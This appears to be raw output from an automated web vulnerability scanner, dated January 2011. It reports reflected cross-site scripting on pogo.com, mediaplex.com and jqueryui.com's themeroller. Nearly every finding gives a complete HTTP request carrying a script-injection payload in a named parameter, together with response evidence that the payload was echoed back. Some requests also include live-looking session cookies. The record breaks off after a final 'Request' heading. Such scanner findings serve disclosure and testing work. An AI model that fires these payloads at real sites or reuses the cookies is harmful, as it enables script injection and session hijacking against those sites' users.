GET /room/loading/loading.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.combb224\'%3balert(1)//91fe0cf4ea7&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
The value of the ahst request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload daa89"><script>alert(1)</script>fd398f6c0d0 was submitted in the ahst parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/loading.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.comdaa89"><script>alert(1)</script>fd398f6c0d0&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow&ctim=1294536902423&vmtype=sun&vmver=1.6.0_23 HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/room/loading/jvmtest.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of the ctim request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61840"><script>alert(1)</script>6578a7562cd was submitted in the ctim parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/loading.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow&ctim=129453690242361840"><script>alert(1)</script>6578a7562cd&vmtype=sun&vmver=1.6.0_23 HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/room/loading/jvmtest.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25a4f"%3balert(1)//e973b8a1d5f was submitted in the mpck parameter. This input was echoed as 25a4f";alert(1)//e973b8a1d5f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cgi-bin/html/0/7440/MT_300x250_8428_watermelonnew.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F7440-39748-1543-3%3Fmpt%3D333452725a4f"%3balert(1)//e973b8a1d5f&mpt=3334527&mpvc= HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=517004695355
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:45 GMT Server: Apache Last-Modified: Tue, 28 Oct 2008 17:22:29 GMT ETag: "36e97-a5f-45a537df77f40" Accept-Ranges: bytes Content-Length: 3014 Content-Type: application/x-javascript
var mp_swver = 0;
var mp_html = ""; if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin ) { if( na ...[SNIP]... <a href=\"http://altfarm.mediaplex.com/ad/ck/7440-39748-1543-3?mpt=333452725a4f";alert(1)//e973b8a1d5f\" TARGET=\"_blank\"> ...[SNIP]...
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca6f3"%3balert(1)//565e2651fa8 was submitted in the mpvc parameter. This input was echoed as ca6f3";alert(1)//565e2651fa8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cgi-bin/html/0/7440/MT_300x250_8428_watermelonnew.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F7440-39748-1543-3%3Fmpt%3D3334527&mpt=3334527&mpvc=ca6f3"%3balert(1)//565e2651fa8 HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=517004695355
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:55 GMT Server: Apache Last-Modified: Tue, 28 Oct 2008 17:22:29 GMT ETag: "36e97-a5f-45a537df77f40" Accept-Ranges: bytes Content-Length: 3006 Content-Type: application/x-javascript
var mp_swver = 0;
var mp_html = ""; if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin ) { if( na ...[SNIP]... <PARAM NAME=FlashVars VALUE=\"clickTAG=ca6f3";alert(1)//565e2651fa8http://altfarm.mediaplex.com/ad/ck/7440-39748-1543-3?mpt=3334527\"> ...[SNIP]...
The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10928"><script>alert(1)</script>6fef2509755 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff10928"><script>alert(1)</script>6fef2509755&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d4e2"><script>alert(1)</script>dcce7cfb063 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff4d4e2"><script>alert(1)</script>dcce7cfb063&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:32 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067
The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b195c"><script>alert(1)</script>27be7fe23ad was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6b195c"><script>alert(1)</script>27be7fe23ad&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:35 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067
The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e489"><script>alert(1)</script>dc7a9b05d2b was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc1e489"><script>alert(1)</script>dc7a9b05d2b&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067
The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3461"><script>alert(1)</script>dc9603a665a was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadadaa3461"><script>alert(1)</script>dc9603a665a&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:38 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067
The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70b06"><script>alert(1)</script>260e8928b06 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=7570b06"><script>alert(1)</script>260e8928b06&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:33 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067
The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 412a9"><script>alert(1)</script>d0a34beb0ed was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75412a9"><script>alert(1)</script>d0a34beb0ed&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:36 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067
The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6733"><script>alert(1)</script>827db728bcf was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75f6733"><script>alert(1)</script>827db728bcf&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:29 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067
The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e781b"><script>alert(1)</script>d89796c6075 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75e781b"><script>alert(1)</script>d89796c6075&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067
The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88dc1"><script>alert(1)</script>9cc354f2545 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
